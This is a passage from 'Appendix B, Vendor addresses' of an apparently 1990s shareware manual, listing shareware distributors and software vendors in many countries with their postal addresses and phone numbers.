+ Phone: 810-528-9944 + + Bayside Computing Services + Address: 7344 Royal Palm Drive, Newport Richey FL 34652-1125 + Phone: 813-845-0973 + + BCS Shareware + Address: 100 North Tommy, HARRISON AR 72601 + Phone: 501-741-6512 + + Bee Software Publishing, Inc. + Address: PO BOX 1179, Hammond IN 46325 + Phone: 219-931-3761 + + Bertone Stefano + Address: via Inama 22, Milano 20133 ITALY + Phone: 39-382-617919 + + BetaCorp Technologies Inc + Address: 6770-40 Davand Dr, Mississauga ON L5T 2G3 CANADA + Phone: 905-564-2424 + + Big Byte Software + Address: 3833 Misty Meadow, Fort Worth TX 76133 + Phone: 817-292-4463 + + Bit Bang (Branch of Canadesign) + Address: PO Box 306 Station Delorimier, Montreal QB H2H 2N7 + CANADA + Phone: 514-598-8406 + + Black Box Vending Machines P/L + Address: 18 Elaine Street, KARALEE QUEENSLAND 4306 AUSTRALIA + Phone: 61 7-294-7099 + + Bright Idea! Software + Address: 5339 Prospect Road, Ste 197, San Jose CA 95129 + Phone: 408-252-0542 + + Brightspark Computers & Pick-A-Disk + Address: Unit 7, 10-12 Dewar Street, Morley Perth WEST + AUSTRALIA 6062 AUSTRALIA + Phone: 011-09-375-1178 + + BroCo Software + Address: PO Box 446, 3760 AK SOEST NETHERLANDS + Phone: 31 2155 26650 + + Appendix B, "Vendor addresses" 706 + + + + Buckeye Software + Address: PO BOX 672, ANTWERP OH 45813 + Phone: 419-258-2506 + + Budgetware + Address: 9 Albermarle Street, Newtown NSW 2042 AUSTRALIA + Phone: 011-612-519-4233 + + Buster Software + Address: PO Box 131, Verbena AL 36091-0131 + Phone: 800-598-7238 + + Campbell's Shareware Center + Address: 189 Rural Street Box 57, Austin IN 47102 + Phone: 812-794-3739 + + CAPS + Address: 5132 Marion Ave, Cypress CA 90630-4427 + Phone: 714-236-9271 + + CD Rom Paradise SRL + Address: PO Box 10177, 20100 Milano ITALY + Phone: 39 2 70603189 + + CD World Publishing Plus Corp + Address: 5018 S Price Road, Tempe AZ 85282-7445 + Phone: 602-839-3031 + + CDRP/Chestnut + Address: 101 Rogers Street, Cambridge MA 02142-1409 + Phone: 617-494-5330 + + CDV Software GmbH + Address: Neureuter Str. 37b, 76185 Karlsruhe GERMANY + Phone: 0721-972240 + + Central Computerware + Address: 183 South Main St, Templeton MA 01468 + Phone: 508-939-2138 + + Cheil Computer System Inc + Address: 138-173 Ssangmoon-Dong Dobong-Gu, Seoul 132-032 KOREA + Phone: 82-02-994-5192 + + Choice Marketing + Address: 33 Bouvardia Way, Greenwood WEST AUSTRALIA 6024 + AUSTRALIA + Phone: 2464400 + + CM Shareware Distribution + Address: PO Box 10, Smeaton SK S0J 2J0 CANADA + Phone: 306-426-2384 + + Appendix B, "Vendor addresses" 707 + + + + CompuData ltda + Address: Tucapel 564 Oficina 77, PO Box 2706, Concepcion CHILE + Phone: 56 41-246035 + + CompuSoft + Address: 6209 15TH AVE NW, Seattle WA 98107 + Phone: 206-784-8140 + + Compustuff + Address: 2759 Medina Road, Medina OH 44256 + Phone: 216-725-7729 + + Computer Advantage Company Inc + Address: 9840 Pondera Ave NW, Massillon OH 44646 + Phone: 216-854-3305 + + Computer Brokers Limited + Address: 1 Devitt Close, ASHTEAD SURREY KT21 1JS U.K. + Phone: 44 372 279441 + + Computer Habit Inc + th + Address: 8100 S 84 St, Omaha NE 68128 + Phone: 402-592-7976 + + Computer Media Concepts + Address: 4029 North Course Drive, Charlotte NC 28277-7611 + Phone: 704-544-0172 + + Computer Shareware Library + Address: Shop 1/44 Lincoln Street Strathpine, BRISBANE QLD 4500 + AUSTRALIA + Phone: 07 881 3694 + + Computer Software Library + Address: PO BOX 162, TIMARU 8615 NEW ZEALAND + Phone: +64-3-615-9333 + + Computer Solutions Dorth + Address: POSTBUS 59, NL-7213 GORSSEL NETHERLANDS + Phone: 31 5759-4545 + + Computer Solutions Software Gm + Address: Gartenstr. 2, GRAFING W-8018 GERMANY + + Computing Strategies Inc + Address: 7700 Clayton Rd Suite 302, ST LOUIS MO 63117 + Phone: 314-644-6181 + + CopyCats + Address: Postbus 1088, Heerhugowaard NL1700BB NETHERLANDS + Phone: 31 2207 45993 + + Appendix B, "Vendor addresses" 708 + + + + Cross Country Shareware + Address: 2 - 53 Victoria Rd South, GUELPH ON N1E 5P7 CANADA + Phone: 519-837-0777 + + D & L Computer Services + Address: 724-173 Creek Ridge Rd, Greensboro NC 27406 + Phone: 910-299-1067 + + D&M Enterprizes + Address: PO BOX 9, GRANGER IN 46530 + Phone: 219-271-2024 + + Daniel Group Communications + Address: PO Box 750711, Dayton OH 45475-0711 + Phone: 513-439-5015 + + Data Mate + Address: 24 Crestwood Lane, Lake Ronkonkoma NY 11779-1912 + Phone: 516-588-3964 + + Data Outlet Shareware + Address: PO Box 37278, RICHMOND VA 23234-7278 + Phone: 804-768-0420 + + DataMatta + Address: 386 North Main St, Woonsocket RI 02895-2003 + Phone: 401-766-8571 + + Derrick's Software Choices + Address: Box 315, Bruno SK S0K 0S0 CANADA + Phone: 306-369-4116 + + Diemme Editori Srl + Address: Via PO 7, RENDE COSENZA 87030 ITALY + Phone: 039-984-466800 + + Digital Expressions Inc + Address: 2107-B Powers Ferry Road, Marietta GA 30067 + Phone: 404-577-4914 + + Digital Impact Inc + Address: 6506 South Lewis Ste 250, Tulsa OK 74136 + Phone: 918-742-2022 + + Direct Original Software Inc. + Address: 30439 CENTER RIDGE ROAD, WESTLAKE OH 44145 + Phone: 216-871-0027 + + Direct Software Distribution + Address: 120 Poplar Dr, Douglassville PA 19518 + Phone: 610-385-7211 + + Appendix B, "Vendor addresses" 709 + + + + Dispro Software Ltda. + Address: AV. PAULISTA, 2073-11 ANDAR, CJ 1101 - ED. HORSA I, + SAO PAULO SP 01395-900 BRASIL + Phone: 251 2344 + + Domainsoft + Address: 8 Bonus Court, Werribee VICTORIA 3030 AUSTRALIA + Phone: 61 3 741 8613 + + DOSgg ProgrammaTheek + Address: Bremlaan 14, Rhenen 3911 XH NETHERLANDS + Phone: 31 8376 17429 + + DP Tool Club + Address: 99 Rue Parmentier, Villeneuve D'Ascq F-59493 FRANCE + Phone: 33-2084-5533 + + DTP Studio spol. sr.o. + Address: Nademlejnska 7, Prague 9 19800 CZECH REP + Phone: 42-2-862931 + + Eagle Shareware + Address: 2345 MOORPARK WAY, HENDERSON NV 89014-3630 + Phone: 702-434-4791 + + Easy Life Inc + Address: 4604 Deerfield Circle, Sioux Falls SD 57105 + Phone: 605-339-2430 + + Edensoft Limited + Address: Rm 15, 7/F Goldfield Industrial Cen, 1 Sui Wo Road, Fo + Tan SHATIN HONG KONG + Phone: 852-687-1135 + + En Linea + Address: Tenancingo No 428 Col Mitras Centro, Monterrey NUEVO + LEON 64460 MEXICO + Phone: 91 83 467505 + + Encode Business Systems Inc + Address: 434 West St North, Orillia ON L3V 5E8 CANADA + Phone: 705-327-7628 + + Eracom Sdn. Bhd. + Address: 35A, Jalan Jejaka 9, Taman Maluri, Kuala Lumpur 55100 + MALAYSIA + Phone: 603-9853108 + + Estudio Shareware + Address: Av. Rivadavia 5040 Local 21, 1424 Capital Federal + ARGENTINA + Phone: 541-903-7310 + + Appendix B, "Vendor addresses" 710 + + + + Excel-nt Software + Address: 714 Maple, Midland MI 48640 + Phone: 517-839-7348 + + Extrabyte Sdn.Bhd + Address: 2 Jalan SS21/8, Damansara Utama, Petaling Jaya + SELANGOR 47400 MALAYSIA + Phone: 03 718-3527 + + EZ Software + Address: PO Box 609, Krum TX 76249 + Phone: 214-241-2161 X333 + + Falsoft Inc - Software Shopper + Address: PO Box 385, Prospect KY 40059 + Phone: 502-228-4492 + + First Computer Centre + Address: Unit 3 Armley Park Court, Stanningley Rd, Leeds + YORKSHIRE LS12 2AE U.K. + Phone: 44-532-311536 + + Farrell, Claire + Address: PO Box 2542, Dartmouth NS B2W 4B7 CANADA + Phone: 902-462-4453 + + Friendware SL + Address: Rafael Calvo, 40, 28010 Madrid SPAIN + Phone: 308-3446 + + Fugue Software + Address: 20 Arundel St, Alexandra Hills QLD 4161 AUSTRALIA + Phone: 61-7-824-2843 + + G & J Technologies + Address: 2706 Rose Blvd, Orlando FL 32839 + Phone: 407-855-7080 + + Gamebox c/o Galcom + Address: Hardturmstr 169, Zurich 8005 SWITZERLAND + Phone: 41-1444-26-44 + + Gem Shareware Software + Address: 433 Highwood Dr, Slidell LA 70458-1708 + Phone: 504-649-9777 + + Gunzameory Computer Institute + Address: Yoido PO Box 392, Yongdungpo-ku, Seoul KOREA + Phone: 822-714-7539 + + H & J Software + Address: 311 Marlow Court, Chesapeake VA 23320 + Phone: 804-482-5798 + + Appendix B, "Vendor addresses" 711 + + + + Halpenny Sales + Address: 23275 Friendship Road, Pilot Point TX 76258-9241 + Phone: 817-440-2995 + + Hamilton New Media + Address: 327 Ouachita Avenue, Hot Spring AR 71901 + Phone: 501-321-2208 + + Hamsoft Shareware Library + Address: 580 Lowe Street, Hastings 4201 NEW ZEALAND + Phone: 64-6-876-9808 + + Hill Computer Goodies + Address: Eastland Mall, North Versailles PA 15137 + Phone: 412-678-8003 + + Hillsoft + Address: PO BOX 16, VRIEZENVEEN 7670 AA HOLLAND + Phone: 0 5498 59599 + + Hourglass Software + Address: 20231 Oak River Ct, Matoaco VA 23803 + Phone: 804-590-9041 + + HRS Software Club + Address: 10 Tangmere Crescent, Markham ON L3R 6Y9 CANADA + Phone: 905-477-4144 + + Husco Austria Handelsgesellshcaft m.b.H. + Address: Bosendorferstrasse 4, VIENNA 1010 Wien AUSTRIA + Phone: 431/505 43 11 + + IkeaMo Enterprises + Address: 111 1/2 W Spring St #I, LaGrange IN 46761-1843 + Phone: 219-463-5246 + + Independent Micro Consulting (IMC) + Address: 134 Upland Drive, MEDICINE HAT ALBERTA T1A 3N7 CANADA + Phone: 403-527-2826 + + Info-Soft + Address: 825 Belvedere sud Bureau 100, Sherbrooke PQ J1H 4B9 + CANADA + Phone: 819-564-6673 + + International Market, MCCA + Address: PO Box 41, Madisonville TX 77864-041 + Phone: 409-348-6963 + + J and J Software + Address: 1323 McGuire, Jackson MI 49202 + Phone: 517-787-5852 + + Appendix B, "Vendor addresses" 712 + + + + Jamtec + Address: Unit 21, 27 Rickard Road, Bankstown NSW 2000 AUSTRALIA + Phone: 61 2 7072924 + + JCS Marketing, Inc + Address: PO Box 1216, Lakeville MN 55044 + Phone: 612-469-5898 + + Jim - Tech Enterprises + Address: PO Box 659, Fraser Lake BC VOJ 1SO CANADA + Phone: 604-699-8650 + + Jimaz + Address: HERMANOVA 37, PRAHA 7 170 00 CZECHOSLOVAK + Phone: 422379498 + + JonDan Computers + Address: 10 Riveraum Drive, Burpengary QUEENSLAND 4505 + AUSTRALIA + Phone: 61 7 886-6687 + + Joshua Advanced Data Systems Ltd Oy + Address: PO Box 63, Tykistokatu 4D,DIO, Turku 20521 FINLAND + Phone: 358-21-6375754 + + K & M + Address: Van Diemenstraat 88, 1013 CN Amsterdam NETHERLANDS + Phone: 31-20-6385509 + + K & M Software + Address: PO BOX 156, Elsberry MO 63343 + Phone: 314-898-5300 + + K Graphics + Address: RDH Box 675 Tanger Avenue, Franklinville NJ 08322 + Phone: 609-728-4839 + + Kelly Data GmbH + Address: Lena-Christ-Stre 50, Martinsried D-82152 GERMANY + + Kelstar-1 Software + Address: PO Box 2403, Bartlesville OK 74005-2403 + Phone: 918-333-5834 + + Kurt Mitchell Enterprises, Inc + Address: 100 BROADWAY BOX 156, LYNBROOK NY 11563 + Phone: 517-887-9610 + + KWN Systems Inc + Address: 220 Stonehurst Blvd, FREEHOLD NJ 07728 + Phone: 800-245-9399 + + Appendix B, "Vendor addresses" 713 + + + + Lady-J Software + Address: PO Box 6079, Auburn CA 95604 + Phone: 916-887-1104 + + Laservend, Inc + Address: 12215 S 900 E, Draper UT 84020-9715 + Phone: 801-553-9080 + + Lavonia Trading Ltd + Address: Residenta S1, CH-6528, Camorino CH SWITZERLAND + Phone: 0041-91-508820 + + Lewis Enterprises + Address: 2913 Lindbrook Dr., Riverbank CA 95367 + Phone: 209-869-4000 + + Lilliput Shareware Distribution + Address: 3-26-2 MINAMI, SATTE CITY SAITAMA PREF. 340-01 JAPAN + Phone: 81-480-43-6225 + + Limelight ublishing + Address: 2718 Rand Road, Indianapolis IN 46241 + Phone: 317-487-8800 X200 + + Logiciels Nifty Softwares + Address: 102 Languedoc, Delson QUEBEC J0L 2GO CANADA + Phone: 514-635-6052 + + LT-1 Enterrpises Inc + Address: 118 West Washington St, MARENGO IL 60152 + Phone: 815-568-7000 + + Ludi-Part + Address: Halen 61, CH - 3037 HERRENSCHWANDEN Switzerland + Phone: 41-31-302-8137 + + Luna Tech + Address: 212 North Ave, Haverhill MA 02830 + Phone: 508-374-2673 + + M & M Computing + Address: 43 Maple Street, Newburgh NY 12550 + Phone: 914-569-0510 + + M & M Software + Address: 3252 Los Coyotes Drag, Long Beach CA 90815 + Phone: 310-420-2655 + + M.A.D. Shareware + Address: 1542 Live Oak Dr, Silver Spring MD 20910 + Phone: 301-587-0545 + + Appendix B, "Vendor addresses" 714 + + + + Magic Stone Co LTD + Address: PO Box 48-542, TAIPEI TAIWAN REP OF CHINA + Phone: 8862752211 + + Main Gate Enterprises Inc + Address: 5448 Hoffner Avenue Suite 407, ORLANDO FL 32812 + Phone: 407-380-9313 + + Manaccom (S.A) + Address: 93A Kensington Road, Norwood ADELAIDE 5067 AUSTRALIA + Phone: 61 8 364 2753 + + Manaccom Pty Ltd + Address: 3/9 Camford Street, Milton 4064 QLD AUSTRALIA + Phone: 617-368-2366 + + Mantis d.o.o. + Address: Reboljeva 11, PO BOX 55, LJUBLJANA 61113 SLOVENIA + Phone: 38 61 340 664 + + MaryKay Software + Address: 5142 N State Rd, Alma MI 48801 + Phone: 517-561-2682 + + Masled Informatica + Address: Via Degzi Oleandri, 68, 04011 Aprilia (LT) ITALY + Phone: 319 6 9275638 + + MediaLand, Inc. + Address: 41 Bentworth Crescent, Nepean ON K2G 3X1 CANADA + Phone: 613-828-6711 + + MegaByte(Shareware) U.K. + Address: 90 Cameron Way, Knightsridge, Livingston WEST LOTHIAN + EH54 8HF U.K. + Phone: 0506-441384 + + MEI/Micro Center + Address: 1555 West Lane Avenue, COLUMBUS OH 43235 + Phone: 614-481-4425 + + Micom Data Services Inc + Address: 10345 Highway 78, Summerville SC 29483 + Phone: 803-821-9282 + + Micro Star + Address: 2245 Camino Vida Roble, Carlsbad CA 92009-1502 + Phone: 619-931-4949 + + Microbyte Sytems Inc + Address: 1457 E Palatine Rd, Arlington Heights IL 60004 + Phone: 708-349-0555 + + Appendix B, "Vendor addresses" 715 + + + + MicroData Computer Services + Address: 6510 Parkland Ave, Brook Park OH 44142 + Phone: 216-843-2662 + + Microforum Mfg Inc + Address: 1 Woodborough Ave, Toronto ON M6M 5A1 CANADA + Phone: 416-656-6406 + + Microlane + Address: PL 59, Ikaalinen 39501 FINLAND + Phone: 950-5116251 + + Microsolve Technologies + Address: Brodiorion House, 19 Brodorion Drive, Morriston + SWANSEA SA6 6LP U.K. + Phone: 441792775909 + + Middle East Information Group + Address: Rehov Oved 8, Abu-Tor Jerusalem 93551 ISRAEL + Phone: 02-731-443 + + Miller's Computers + Address: 5791 LIBRARY ROAD, BETHEL PARK PA 15102 + Phone: 412-854-2022 + + Mobbley's Computers + Address: 6260 Thorold Stone Rd, Niagara Falls ON L2J 1AF CANADA + Phone: 905-354-2339 + + Mom 'N' Pop's Software + Address: 3431 Dow Lane, Spring Hill FL 34609 + Phone: 904-688-9108 + + Monster Media Inc + Address: 2331 Ardmore Ave, Royal Oak MI 48073-3601 + Phone: 810-547-8160 + + Morrison Wallaace + Address: Suite 1, 15 Grosvenor St, NEUTRAL BAY NSW 2089 + AUSTRALIA + Phone: 02 9539332 + + Most Significant Bits + Address: 37207 Colorado Ave, Avon OH 44011-1527 + Phone: 216-221-6665 + + Mountain of Shareware + Address: , 7105 George Ct, Wooster OH 44691 + Phone: 216-345-6825 + + Mr Disk Software + Address: 5915 Casey Drive, PO Box 59012, Knoxville TN 37909 + Phone: 615-584-3952 + + Appendix B, "Vendor addresses" 716 + + + + Nane Juergensen + Address: Nordergraben 26, 24937 Flensburg GERMANY + Phone: 49-4961-18-23-40 + + Neon Publishing Inc + Address: 14220 Carlson Circle, Tampa FL 33626 + Phone: 813-854-5515 + + New Horizons Enterprise + Address: 7 Yardarm Court, Greensboro NC 27455 + Phone: 910-282-8060 + + News Software Gmbh + Address: Birkenstr. 42, DUSSELDORF 40233 GERMANY + Phone: 211-676-201 + + Night Owl's Publisher Inc. + Address: 1611 Falconer Stillwater RD, Jamestown NY 14701 + Phone: 716-484-3066 + + NovaWare, Inc. + Address: 7477 Stanford, St Louis MO 63130 + Phone: 314-862-6311 + + On Disk + Address: 4227 Chambers St, Cincinnati OH 45223 + Phone: 513-541-2675 + + OWOBOPTE Industries Inc + Address: 3101 Sibley Memorial Hwy, Eagan MN 55121 + Phone: 612-686-0405 + + P & A Co., Ltd + Address: 1362 Kamisunacho, Tachikawa, TOKYO 190 JAPAN + Phone: 0425-35-9901 + + P.D.(&Shareware)Software Library + Address: Winscombe House, Beacon Rd, Crowborough Sussex TN6 + 1UL U.K. + Phone: 0892-663298 + + P.R.O. Shareware + Address: 30 Blounts Drive, Uttoxeter, Staffordshire ST14 8TQ + U.K. + Phone: 0585 171803 + + Paradise Shareware + Address: 960 W San Marlos Blvd Ste 2-D, San Marcos CA 92069 + Phone: 619-591-4175 + + PC Independent User Group + Address: 87 High Street, Tonbridge Kent TN9 1RX U.K. + Phone: 0732-771512 + + Appendix B, "Vendor addresses" 717 + + + + PC Productivity, Inc. + Address: 5777 Riverside Dr, Cape Coral FL 33904 + Phone: 813-542-6079 + + PC-Klubben Danmark + Address: Ormslevvej 20, Viby J 8260 Denmark + Phone: 45-86110600 + + PCDisk + Address: PO Box 10627, Killeen TX 76547-0627 + Phone: 817-526-2383 + + PD Software Services P/L + Address: 8 BENTLEY ST, WANTIRNA 3152 AUSTRALIA + Phone: 03-729-9534 + + Pearl America Inc + Address: 4824 California Ave SW, Seattle WA 98116 + Phone: 206-938-0336 + + Pee Sea Shareware + rd + Address: 4711 33 Street, San Diego CA 92116 + Phone: 619-696-5008 + + Pennant Enterprises Inc + Address: 4207 Elmhurst, Toledo OH 43613 + Phone: 419-473-0875 + + Personal Computer Services + Address: 14 Crawford Street, Dunedin 9011 NEW ZEALAND + Phone: 064-03-4777-288 + + Phillips Software + Address: 21 Caudle Avenue, Lakenheath SUFFOLK 1P27 9AV ENGLAND + Phone: 01-842-860247 + + Pik A Program + Address: 13 St. Marks Place, New York NY 10003 + Phone: 212-598-4459 + + Pointsoft + Address: 111 Rue De Croix, HEM 59510 FRANCE + Phone: 33-20-81-25-25 + + Politiken + Address: Raadhuspladsen 37, COPENHAGEN 1785 V DENMARK + Phone: 45 33 11 85 11 + + Positronic Software + Address: PO Box 122, Fillmore SK 50G 1N0 CANADA + Phone: 306-722-3225 + + Appendix B, "Vendor addresses" 718 + + + + Power User + Address: 3205 Hazel St, Erie PA 16508 + Phone: 814-454-0234 + + Prime Soft, W. Willaredt + Address: Bahnhofstraase 7, CH-8157 Dielsdorf SWITZERLAND + Phone: 41-1-854-0374 + + Printers Shareware + Address: 5019-5021 West Lovers Lane, Dallas TX 75209 + Phone: 214-350-5353 + + Pro Soft + Address: 4 Benloese Skel 4G, RINGSTED DK-4100 DENMARK + Phone: 45 53619042 + + Pro-Line Software + Address: PO BOX 2416, CLIFTON NJ 07015 + Phone: 201-546-2550 + + Professional Systems Group, LTD. + Address: 210 Woodgate Dr S #D, Brandon MS 39042-2424 + Phone: 601-936-4866 + + Chang, Steven + Address: 7F-2 No.234, Nanking East Rd Sec 5, Taipei TAIWAN + Phone: 886-2-7468626 + + Public (software) Library + Address: PO BOX 35705, Houston TX 77235-5705 + Phone: 713-524-6394 + + Public Brand Software + Address: 25 First Street, Cambridge MA 02141 + Phone: 617-252-5533 + + Quantum Axcess + th + Address: 240 N 5 St Ste 330, Columbus OH 43215 + Phone: 614-228-3903 + + Quantum Computers + Address: PO Box 49, North Highlands CA 95660-0049 + Phone: 916-331-2369 + + R & K Software + Address: 2165 Salem Avenue N, St Petersburg FL 33714-4139 + Phone: 813-526-8713 + + R.F. South Pacific Shareware + Address: 27 Chester Ave, Baulkham Hills NSW 2153 AUSTRALIA + Phone: 02-624-5205 + + Appendix B, "Vendor addresses" 719 + + + + R.O.I. Software Distributing + Address: 981 Wellington Road South Ste 141, London ON N6E 3A9 + CANADA + Phone: 519-642-3522 + + RabbitWare + Address: PO Box 232, Berowra NSW 2081 AUSTRALIA + Phone: 61 043 891699 + + Radical Concepts + th + Address: 516 36 St, Newport Beach CA 92663 + Phone: 714-723-4351 + + Reasonable Solutions, Inc + Address: 1535 E University Drive, Mesa AZ 85203 + Phone: 602-668-0017 + + Red River CDs + Address: 622 S Central, Idabel OK 74745-0286 + Phone: 405-286-7791 + + SAS Software + Address: PO Box 104375 Station B, Howard Beach NY 11414 + Phone: 718-848-0301 + + Sat-Tech Systems + Address: 97 Sydney Road Brunswick, Melbourne VIC 3056 AUSTRALIA + Phone: 03-329-9255 + + SBD Software + Address: 109 E Kentucky St, Franklin KY 42134-1837 + Phone: 502-746-9140 + + Seltec NZ (1993) Ltd. + Address: 83B Buxton Square, PO Box 943, NELSON 7015 NEW ZEALAND + Phone: 03 548-4622 + + Share Warehouse Limited + Address: 18 Colchester Cres, Newlands, Wellington 6004 New + Zealand + Phone: 64-04-477-3535 + + Sharemart + Address: 105 Summer St, Foxboro MA 02035-3037 + Phone: 617-769-9063 + + Shareware + Address: PO Box 7037, Long Beach CA 90807-0037 + Phone: 310-499-1262 + + ShareWare City + Address: 621 Snowball Road, Monroeville PA 15146-1229 + Phone: 412-373-6572 + + Appendix B, "Vendor addresses" 720 + + + + Shareware Depot + Address: 2077 W. 76 STREET, HIALEAH FL 33016 + Phone: 305-822-0122 + + Shareware Distributie Nederland + Address: M.L. Kinglaan 51, Haarlem 2037 RK NETHERLANDS' + Phone: 31-23-338-651 + + Shareware Express + Address: 1908 ASHLAND STREET #D, ASHLAND OR 97520 + Phone: 503-482-5136 + + Shareware Express+ + Address: 7333 Cedar Creek Ct, Winter Park FL 32792-6567 + Phone: 407-348-8486 + + Shareware Hot Picks + Address: PO Box 51 o, Lake Elmo MN + 55042-0051 + Phone: 612-777-5153 + + Shareware Marketing (M) Sdn Bhd + Address: 9A Lintang Angsana, Bandar Baru, Ayer Itam, Penang + PENANG 11500 MALAYSIA + Phone: 604-8261181 + + Shareware Source + Address: 41 Blythewood Drive, Greenville SC 29607 + Phone: 803-232-7102 + + Shareware Testing Laboratories + Address: PO Box 11499, Indianapolis IN 46201-0499 + Phone: 317-322-2000 + + Shareware To Go + Address: PO Box 31303, Raleigh NC 27622-1303 + Phone: 800-277-DISK + + Shareware Unlimited Etc + Address: 5225 Canyon Crest Dr #71-315, Riverside CA 92507 + Phone: 909-789-2336 + + Shareware World + Address: PO Box 757, Seven Hills NSW 2147 AUSTRALIA + Phone: 61 2 671-6647 + + Shareware, Etc. + Address: 112 Wilson Street Apt 108, Durant OK 74701-3503 + Phone: 918-543-6143 + + Shareware-Elite + Address: 25 Cades Park, Helston Cornwall TR13 8QS U.K. + Phone: 01326-564164 + + Appendix B, "Vendor addresses" 721 + + + + Sharewareservice M Birr + Address: Heuweg 4 PO Box 1629, 21497 Geesthacht GERMANY + Phone: XX49 X4152 76055 + + Simply Software Ltd + Address: PO Box 1391, Greenwood NS BOP 1NO CANADA + Phone: 902-765-2534 + + Sitelsa + Address: Via Augusta 186, Barcelona 08021 SPAIN + Phone: 34 34140192 + + Skip's Shareware Selections + Address: C/O 4604B Northland Place, Courtenay BC V9N 8Y5 CANADA + + Slash K Software + Address: 3661 N Campbell Ave Ste #201, Tucson AZ 85719 + Phone: 520-747-1521 + + SMM Software GmbH + Address: Hermann-Lons-Str. 12, 55254 Budenheim GERMANY + Phone: 01149 6139 916-916 + + SMS Shareware + Address: 19 Carshalton Road, Camberley SURREY GU15 4AQ U.K. + Phone: 44 276 681864 + + Softdesign Concepts Company + Address: PO Box 392, MECHANICSBURG PA 17055 + Phone: 717-795-9583 + + Softline + Address: PO BOX 587, Heddal Notodden N-3671 Norway + Phone: 473620966 + + SoftMarket S.A. + Address: Lincoyan 1040, Nunoa, Santiago CHILE + Phone: 562-3413083 + + SoftMate GmbH + Address: Kapfenburgstrasse 74, STUTTGART 70469 GERMANY + Phone: 0049 711 85977-0 + + Software & Hardware + Address: CALLE COTLLIVRE, 26-6-B, PALMA BALEARES 07010 SPAIN + Phone: 971-290463 + + Software Concepts + Address: 3130 N. Arazona Ave., Suite 105, Chandler AZ 85224 + Phone: 602-545-9321 + + Software Heaven (Australia) Pty Ltd + Address: 658 Pittwater Rd, Brookvale NSW 2100 AUSTRALIA + Phone: 61-2-905-7006 + + Appendix B, "Vendor addresses" 722 + + + + Software of the Month Club + Address: 5816 Dryden Place, Carlsbad CA 92008 + Phone: 619-931-8111 + + Solvit Chosun Media Inc + Address: 748-16 Namchang B/D, Yeoksam-Dong Kangnam-Gu, Seoul + KOREA + Phone: 82-2-561-0361 + + Spartan Software Marketing + Address: 170 Jarvis Rd, Inman SC 29349-7680 + Phone: 803-574-0437 + + Spearwood Shareware Service + Address: PO Box 1212, Bibra Lake WEST AUSTRALIA 6163 AUSTRALIA + Phone: 011 61-9-434-3416 + + Spotlight Software Inc + Address: 957 S Glendale St, Wichita KS 67218 + Phone: 316-683-4949 + + Squirrel Shareware + Address: HCR 63 Box 37 B, Cadosia NY 13783 + Phone: 607-637-5300 + + STG Computers LTD + Address: 630 Kipling Avenue, Etobicoke ON M8Z 5S2 Canada + Phone: 416-251-9777 + + StreetSmart Software + Address: 1001 Mason Drive, Hartselle AL 35640 + Phone: 205-773-4024 + + Sunshine Software + th + Address: 8801 N.E. 59 Street, Vancouver WA 98662 + Phone: 360-254-3511 + + Super Software Limited + Address: PO Box 34 145, Auckland NEW ZEALAND + Phone: 64-9-418-0577 + + Svenska PC Klubben + Address: PO Box 125, 421 22 Vastra Frolun SWEDEN + Phone: 46-320-16500 + + Swarland Computer Graphics + Address: 2 Coast View, Swarland, Morpeth NORTHUMBERLAND NE65 + 9JG U.K. + Phone: 44-670-787912 + + Systems Comunicazioni SRL + Address: v Olanda 6, Gaggiano 20083 ITALY + Phone: 39-2-90841814 + + Appendix B, "Vendor addresses" 723 + + + + T'gus + Address: 8980 Underwood Ln N, Maple Grove MN 55369-6717 + Phone: 612-420-6469 + + Target Industries Singapore Pte Ltd + Address: 5006 Ang Mo Kio Ave 5, Singapore 2056 SINGAPORE + Phone: 65-4815422 + + Tech Now + Address: 77 Plymouth Ave, East Wareham MA 02538 + Phone: 508-295-2339 + + Temwa Data Aps + Address: Grumstrupues 35, 8730 Hovedgaard DENMARK + Phone: 45-7566-2611 + + The Cobb Group + Address: 9420 Bunsen Parkway, Louisville KY 40220 + Phone: 502-493-3428 + + the Digital Publishing Company + Address: 6271 Edgemont Blvd #b, Minneapolis MN 55428-2654 + Phone: 612-531-9881 + + The Game Grid + Address: 1907 Twain Place, Placentia CA 92670 + Phone: 714-528-7358 + + The Hi-Tech Marketplace + Address: 3 Vernon Street, Parlin NJ 08859 + Phone: 908-525-2581 + + The Shareware Shoppe + Address: PO Box 454, Ferndale NY 12734 + Phone: 914-292-1574 + + The Simple Series + Address: PO BOX 1167, PLAISTOW NH 03865-1167 + Phone: 603-362-5792 + + The Software House + Address: PO Box 27054, Jerusalem 91270 ISRAEL + Phone: 972 2 830001 + + Theresia Blaecker + Address: Auf der Harre 13, Edewecht Jeddeloh I D-26188 GERMANY + Phone: 49 044 057229 + + Totronik + Address: Rotebuehlstrasse 85, D-70178 Stuttgart WEST GERMANY + Phone: 711-6271980 + + Appendix B, "Vendor addresses" 724 + + + + TRAX + Address: STEENSTRAAT 61, Zedelgem-Aartrijke BELGIUM 8211 EUROPE + Phone: 32-50-20-07-35 + + Trip Software + Address: PO Box 65534, Dundas Postal Outlet, Dundas ON L9H 6Y6 + CANADA + Phone: 905-628-3356 + + Tryware + Address: 42 Churchill Road, Ovingham SA 5082 AUSTRALIA + Phone: 618-269-1108 + + Ultimax + th + Address: 167 100 Ave, Montreal QU H1A 2B6 CANADA + Phone: 514-644-1809 + + Universal Software + Address: 5525 Lorelei Avenue, Lakewood CA 90712 + Phone: 310-866-1274 + + ValueWare + Address: 130 W End Ave, Knoxville TN 37922-2822 + Phone: 615-675-7958 + + Vertical Publishing Corp + Address: One Vertical Dr #C, Canonsburg PA 15317 + Phone: 412-746-4247 + + Videoflicks Canada Limited + Address: 1654 Avenue Road, Toronto ON M5M 3Y1 CANADA + Phone: 416-782-4438 + + Village Center, Inc. + Address: SunLight Bldg 6F, 3-2 Jinbo-Cho, Kanda, Chiyoda-Ward + TOKYO 101 JAPAN + Phone: 81-3-3221-3525 + + Wayne's Shareware + Address: 5116-B S General Bruce Dr, Temple TX 76502 + Phone: 817 899-1161 + + White Roe-Shareware + Address: Fairview Mall PO Box 55191, 1800 Sheppard Ave East, + North York ON M2J 5B9 CANADA + Phone: 416-490-1559 + + Willard Computer Services + Address: 276 W. Bagley Road #201, Berea OH 44017-1864 + Phone: 216-891-1190 + + Appendix B, "Vendor addresses" 725 + + + + Williams Software Corporation + Address: 14761 Pearl Road Ste 309, PO Box 360888, Strongsville + OH 44136 + Phone: 216-225-2340 + + WindowShare + Address: 32,rue des Frieres, B.P. 2078 57051-METZ cedex 2 + FRANCE + Phone: 87 30 85 57 + + Wiz Technology Inc + Address: 32951 Calle Perfecto, San Juan Capistrano CA 92675 + Phone: 714-443-3000 + + 